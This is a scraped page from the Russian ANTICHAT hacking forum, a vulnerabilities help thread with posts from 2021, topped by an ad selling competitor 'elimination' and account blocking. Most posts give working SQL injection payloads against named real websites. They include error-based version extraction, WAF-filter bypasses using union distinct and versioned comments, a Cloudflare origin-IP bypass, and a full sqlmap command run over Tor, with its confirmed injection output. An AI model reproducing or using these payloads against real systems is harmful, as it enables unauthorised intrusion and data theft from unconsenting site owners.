УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Ваши вопросы по уязвимостям.

Страница 292 из 296

292

Опции темы

Поиск в этой теме

Опции просмотра

#2911

02.04.2021, 19:47

Samozvanec

Guest

Сообщений: n/a

Провел на форуме:
1545

Репутация: 1

Цитата:

Сообщение от joelblack

joelblack said:
↑
Error-Based например:

Код:

Code:
http://www.royalporcelain.co.th/agent-download.php?code=-1%27/**_**/AND/**_**/extractvalue(1,concat(0x3a,(select/**_**/@@version)))+--+-

Код:

Code:
XPATH syntax error: ':5.5.65-MariaDB'
Agent Code Is Invalid

Огромное спасибо!

#2912

03.04.2021, 09:17

dooble

Guest

Сообщений: n/a

Провел на форуме:
76692

Репутация: 138

Цитата:

Сообщение от WallHack

WallHack said:
↑
Спасибо за ответ!
Но Null байт уже чекал, из 60-ти сайтов на двух древних сработало
Кстати чекал и на более ранних версиях, в том числе PHP/5.3.3 на ней тоже не сработало почему-то

Фикс был внутри версии 5.3.3, в 5.3.3.7 еще работал, в 5.3.3.8 уже нет.

#2913

08.04.2021, 08:56

crlf

Guest

Сообщений: n/a

Провел на форуме:
169212

Репутация: 441

Цитата:

Сообщение от Samozvanec

Samozvanec said:
↑
Понимаю, что уже наверное достал постить в этой ветке что-то однотипное

Всё в порядке. Тема как раз создавалась для подобных однотипных вопросов, а ваше упорство в попытках постигнуть истинную суть инъекций заслуживает похвалы. Текущее поколение кулхацкеров, скульмаперов и метасплоитеров, тоска жуткая

Цитата:

Сообщение от Samozvanec

Samozvanec said:
↑
но вот проблема, третий день бьюсь и не могу шагнуть дальше количества колонок. И не понятно, Blind это или нет. Функции Case, Substr, Mid и оператор like, в том числе и ASCII результата не принесли (по крайней мере в моих кривых рученках).

Иногда полезно какое-то время уделить разработке. С оптытом, придёт понимание абстрактных внутренних процессов и можно будет с большой вероятностью предположить, в какой части логики находится уязвимость и какого рода она может быть. Сходу, смею вангануть, что инъекция находится в запросе выборки категории, по ID которой в дальнейшем будут выбираться позиции для листинга. Следовательно, если нет вывода ошибок, с большой вероятностью можем предположить лишь булевой вариант. Простейшим выходом в данном случае, будет считывание текущего запроса из INFORMATION_SCHEMA.PROCESSLIST вслепую, чтоб точно подтверить/опровергнуть теорию.

На правах старорега, хотелось бы добавить, что лично я, вообще не поддерживаю раскрутки подобных уязвимостей на чужих площадках публично, дебилов в наше время хватает, поверьте. Но дело каждого, на свой страх и риск как говорится. По поводу же РУ/СНГ ресурсов, вообще есть негласное правило, что их следует стараться обходить стороной, по многим причинам, которые заслуживают отдельного обсуждения, а скорее всего холивара Поэтому, настоятельно рекомедую переварить и принять к сведению полученную информацию. Чтоб закрыть вопрос с этим кейсом, взглянул одним глазком, имеет место неопределённое поведение, но инъекции нет.

#2914

16.04.2021, 10:54

DezMond™

Участник форума

Регистрация: 10.01.2008

Сообщений: 199

Провел на форуме:
961428

Репутация: 662

Отправить сообщение для DezMond™ с помощью ICQ

Помогите ваф обойти, фильтрует юнион селект

Код:

Code:
http://www.ipcinfo.org/ipc-country-analysis/details-map/en/c/459550+uion+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93+--+/?iso3=AFG%27

#2915

16.04.2021, 12:36

WallHack

Guest

Сообщений: n/a

Провел на форуме:
61136

Репутация: 32

Цитата:

Сообщение от DezMond™

DezMond™ said:
↑
Помогите ваф обойти, фильтрует юнион селект

Код:

Code:
http://www.ipcinfo.org/ipc-country-analysis/details-map/en/c/459550+union+distinct+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93+--+/?iso3=AFG%27

#2916

29.05.2021, 10:32

DezMond™

Участник форума

Регистрация: 10.01.2008

Сообщений: 199

Провел на форуме:
961428

Репутация: 662

Не пойму вафа нету, скуля слепая, но скулмап не раскручивает( в чем трабла?

Код:

Code:
https://www.akbw.de/nc/veranstaltungen/veranstaltungskalender-architekturtreff.html?no_cache=1&tx_fufevents_pi1%5Bsearch%5D%5Borganizer%5D=35110

#2917

01.06.2021, 19:04

DezMond™

Участник форума

Регистрация: 10.01.2008

Сообщений: 199

Провел на форуме:
961428

Репутация: 662

Помогите ваф обойти, фильтрует и юнион и селект

Код:

Code:
https://www.baslerhofmann.ch/index.php?id=2649&L=3&tx_cabagjobs_pi1%5BjobUid%5D=914+/*!12345uNIoN*/++/*!12345sELecT*/+1,2,3,4,5+--+

#2918

01.06.2021, 23:03

joelblack

Guest

Сообщений: n/a

Провел на форуме:
70303

Репутация: 145

Цитата:

Сообщение от DezMond™

DezMond™ said:
↑
Помогите ваф обойти, фильтрует и юнион и селект

Код:

Code:
https://www.baslerhofmann.ch/index.php?id=2649&L=3&tx_cabagjobs_pi1%5BjobUid%5D=914+/*!12345uNIoN*/++/*!12345sELecT*/+1,2,3,4,5+--+

Код:

Code:
914+||+(select mid(@@version,1,1)=5)+--+-

#2919

02.06.2021, 19:29

winstrool

Познающий

Регистрация: 06.03.2007

Сообщений: 59

Провел на форуме:
371875

Репутация: 137

Цитата:

Сообщение от DezMond™

DezMond™ said:
↑
Помогите ваф обойти, фильтрует и юнион и селект

Код:

Code:
https://www.baslerhofmann.ch/index.php?id=2649&L=3&tx_cabagjobs_pi1%5BjobUid%5D=914+/*!12345uNIoN*/++/*!12345sELecT*/+1,2,3,4,5+--+

Тут надо клоуд обходить, смотрим ип через DNS history:

____viewdns.info/iphistory/?domain=baslerhofmann.ch

Там будет такая запись:

Цитата:

Сообщение от None

5.148.171.143
Switzerland Nine Internet Solutions AG, Switzerland 2020-12-21

Далее просто направляем скульмап и радуемся жизни:

Цитата:

Сообщение от None

sqlmap --url="
https://5.148.171.143/index.php?id=2649&L=3&tx_cabagjobs_pi1[jobUid]=914*
" --host="
www.baslerhofmann.ch
" --random-agent --tor --tor-port=9150 --tor-type=SOCKS5 --threads=10 --dbms=Mysql --dbs --batch

Итого, что мы имеем:

Цитата:

Сообщение от None

---
Parameter: #1* (URI)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload:
https://5.148.171.143:443/index.php?id=2649&L=3&tx_cabagjobs_pi1[jobUid]=914
AND 5542=5542
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload:
https://5.148.171.143:443/index.php?id=2649&L=3&tx_cabagjobs_pi1[jobUid]=914
AND (SELECT 2193 FROM (SELECT(SLEEP(10)))xYPO)
---